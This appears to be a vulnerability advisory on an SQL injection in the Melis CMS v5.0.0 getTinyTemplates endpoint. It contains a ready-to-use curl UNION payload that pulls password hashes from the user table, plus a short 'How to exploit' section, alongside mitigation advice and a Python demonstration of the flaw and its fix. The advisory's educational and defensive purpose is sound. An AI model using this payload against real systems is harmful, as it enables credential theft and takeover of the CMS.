The CVE-2024-XXXX vulnerability in the Melis Platform CMS is a classic SQL injection flaw in the `getTinyTemplates` endpoint of the `MelisCms/PageEdition` controller. The `idPage` parameter, taken straight from the HTTP request, is concatenated into the SQL query string instead of being bound as a prepared-statement parameter or cast to an integer. A request whose `idPage` value contains a single quote (`'`) therefore closes the string literal in the query, and whatever follows (a `UNION SELECT` that pulls rows from another table, an `OR 1=1--` tautology, or, where the database driver allows stacked queries, a second statement such as `; DROP TABLE ...`) is executed by the database as part of the original query. The UNION variant lets an attacker read arbitrary tables, including the CMS user table and its password hashes, which in turn yields administrative access; with a sufficiently privileged database account the same flaw can be used to modify or delete data, create new administrative users, or drop tables. The net result is a full compromise of the CMS and the data behind it.
Platform: Melis CMS
Version: v5.0.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2024-10-08
Prediction: 2024-10-29
What Undercode Say:
Example request (the payload is sent URL-encoded in the POST body):

curl -X POST 'http://<target>/melis/MelisCms/PageEdition/getTinyTemplates' --data-urlencode "idPage=1' UNION SELECT 1,user_pass,3,4 FROM melis_cms_user-- -"

Resulting query executed by the database:

SELECT * FROM melis_cms_tiny_templates WHERE template_page_id = '1' UNION SELECT 1,user_pass,3,4 FROM melis_cms_user-- -'
How to exploit:
Send HTTP POST requests to the vulnerable endpoint with SQL payloads in the `idPage` parameter. A UNION-based payload must match the column count of the original query (the example above uses four columns); once the count is known, the extra SELECT can be pointed at any table the database account can read, such as `melis_cms_user`, to pull credentials, or at other tables to read or manipulate data.
Protection from this CVE:
Apply the vendor patch. Rewrite the query to use parameterized (prepared) statements so `idPage` is always bound as data, never spliced into SQL text. Validate the parameter server-side as well: `idPage` is a page identifier, so reject anything that is not a positive integer before a query is built. Run the CMS with a least-privilege database account so a remaining injection cannot write to or drop tables. A WAF in front of the CMS is defence in depth for the period before patching, not a fix. Review other controllers for the same concatenation pattern.
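The following added example (not code from the Melis project or from this post) reproduces the mechanism described above and the fix recommended here on an in-memory SQLite database. The schema, the stored rows and the password hashes are constructed stand-ins; only the table names `melis_cms_tiny_templates` and `melis_cms_user`, the column `user_pass` and the `idPage` payload come from the page. It shows the page's payload pulling every row of the user table through the concatenated query, the same payload becoming an inert literal once the value is bound, and an integer check that rejects it before any SQL is built.

```python
import re
import sqlite3

# The idPage value from the advisory's curl example.
PAYLOAD = "1' UNION SELECT 1,user_pass,3,4 FROM melis_cms_user-- -"


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the CMS database (hypothetical columns and rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE melis_cms_tiny_templates (
            template_id INTEGER, template_page_id INTEGER,
            template_name TEXT, template_html TEXT
        );
        CREATE TABLE melis_cms_user (
            usr_id INTEGER, usr_login TEXT, user_pass TEXT, usr_email TEXT
        );
        INSERT INTO melis_cms_tiny_templates VALUES
            (1, 1, 'hero', '<div>hero</div>'),
            (2, 2, 'footer', '<div>footer</div>');
        INSERT INTO melis_cms_user VALUES
            (1, 'admin',  '$2y$10$fakehashadmin',  'admin@example.invalid'),
            (2, 'editor', '$2y$10$fakehasheditor', 'editor@example.invalid');
        """
    )
    return conn


def get_tiny_templates_vulnerable(conn: sqlite3.Connection, id_page: str) -> list:
    """The pattern the advisory describes: the request value is pasted into the SQL text.
    A quote in id_page ends the literal and the rest of the value becomes SQL."""
    sql = (
        "SELECT * FROM melis_cms_tiny_templates "
        "WHERE template_page_id = '%s'" % id_page
    )
    return conn.execute(sql).fetchall()


def get_tiny_templates_bound_only(conn: sqlite3.Connection, id_page: str) -> list:
    """Parameter binding alone: the driver sends id_page as data, so the payload is
    compared as a string and matches nothing. No validation yet."""
    return conn.execute(
        "SELECT * FROM melis_cms_tiny_templates WHERE template_page_id = ?",
        (id_page,),
    ).fetchall()


def get_tiny_templates_fixed(conn: sqlite3.Connection, id_page: str) -> list:
    """Recommended fix: validate that idPage is a positive integer, then bind it."""
    # [0-9]+ rather than \d+: \d also accepts Unicode digits that int() may reject.
    if not re.fullmatch(r"[0-9]+", id_page):
        raise ValueError("idPage must be a positive integer")
    return conn.execute(
        "SELECT * FROM melis_cms_tiny_templates WHERE template_page_id = ?",
        (int(id_page),),
    ).fetchall()


def leaked_hashes(conn: sqlite3.Connection) -> list:
    """Run the advisory's payload through the vulnerable path and pick out the rows
    that came from the UNION branch (their second column is a password hash)."""
    rows = get_tiny_templates_vulnerable(conn, PAYLOAD)
    return sorted(r[1] for r in rows if isinstance(r[1], str) and r[1].startswith("$2y$"))


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", leaked_hashes(db))            # both constructed hashes
    print("bound only:", get_tiny_templates_bound_only(db, PAYLOAD))  # []
    try:
        get_tiny_templates_fixed(db, PAYLOAD)
    except ValueError as exc:
        print("fixed:", exc)
```

The UNION payload works against the vulnerable function only because its SELECT lists four columns, matching the template table; against a real target that count has to be discovered first. Note also that binding by itself already defeats the injection; the integer check is added so that malformed input is rejected and logged at the edge instead of silently returning no rows.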
Impact:
Full read access to the CMS database, including user credentials. Exfiltration of user and content data. Unauthorized administrative access via recovered credentials. Data manipulation or destruction where the database account permits writes.
Sources:
Reported By: github.com

